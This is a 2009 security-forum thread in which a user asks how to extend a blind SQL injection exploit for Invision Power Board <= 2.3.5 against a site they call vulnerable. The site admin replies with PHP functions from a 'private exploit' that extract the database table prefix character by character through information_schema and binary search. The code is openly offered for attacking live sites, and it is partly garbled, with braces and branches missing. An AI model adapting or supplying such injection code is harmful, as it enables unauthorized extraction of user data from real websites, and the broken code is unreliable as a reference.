IT Security and Insecurity Portal

IPB <= 2.3.5 injeciton - Get table prefix and usernames?
IPB <= 2.3.5 injeciton - Get table prefix and usernames?
PostPosted: Sat Jul 11, 2009 6:00 pm
Active user
Active user
Joined: Nov 15, 2008
Posts: 27

Hi everyone,

I've been using waraxe's IPB <= 2.3.5 (version 1.2). I've come across what would be a vulnerable site, but the table prefix isn't ibf_. Another issue is getting the username, since I'm guessing most people rely on the display name being the username.

I can code php pretty well, but my mysql knowledge is pretty primitive. Does anyone have a script out there that ether gets the table prefix, or a username from the user id? If not, if someone could so much as present the concept, I'd love to try and write a script for it and share. I've been semi-studying waraxe's script, and get I alot of it, but the mysql stuff still kinda tarts me out lol.
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Someone allready did modifications you are interested in:


And for your information - here is code snippet, that does the prefix fetching magic:


function get_prefix()
$out = '';
echo "Fetching prefix ...\n";

$p = '(SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)=1';
if(test_condition($p) === false)
die('Failed check for table count');

$p = '(SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)';
$len = get_num(0, 100, $p);
$len -= 16;
if($len < 0)
die('Prefix fetch failed!');
echo "prefix length is $len bytes\n";

//%_members_converge == 0x256d656d626572735f636f6e7665726765
$p = "(SELECT ORD(SUBSTR(table_name,%d,1)) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)";

for($i = 1; $i < $len + 1; $i ++)
$p2 = sprintf($p, $i);
$ch = chr(get_num(32, 128, $p2));
echo "Got pos $i --> $ch\n";
$out .= "$ch";
echo "Current prefix: $out \n";

echo "\nFinal prefix: $out\n\n";

return $out;

It's coming from private exploit, but you can modify it for your own needs.

P.S. MySql version needs to be >= 5.0 because of the information_schema meta database. If MySql is older, then you need to use bruteforce or wordlists in order to guess the prefix.
Active user
Active user
Joined: Nov 15, 2008
Posts: 27

very cool, thanks a lot waraxe Very Happy

edit: any chance you could include the get_num function as well, it calls it, i don't have it? It would save me a lot of time <3
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

renaker wrote:
very cool, thanks a lot waraxe Very Happy

edit: any chance you could include the get_num function as well, it calls it, i don't have it? It would save me a lot of time <3


function get_num($min, $max, $pattern)
$curr = $out = 0;

$area = $max - $min;
if($area < 2 )
$post = $pattern . "=$max";
$eq = test_condition($post);

$out = $max;
$out = $min;


$half = intval(floor($area / 2));
$curr = $min + $half;

$post = $pattern . '%253e' . $curr;

$bigger = test_condition($post);

$min = $curr;
$max = $curr;

echo "Current test: $curr-$max-$min\n";

return $out;
Active user
Active user
Joined: Nov 15, 2008
Posts: 27

thanks agian. Smile
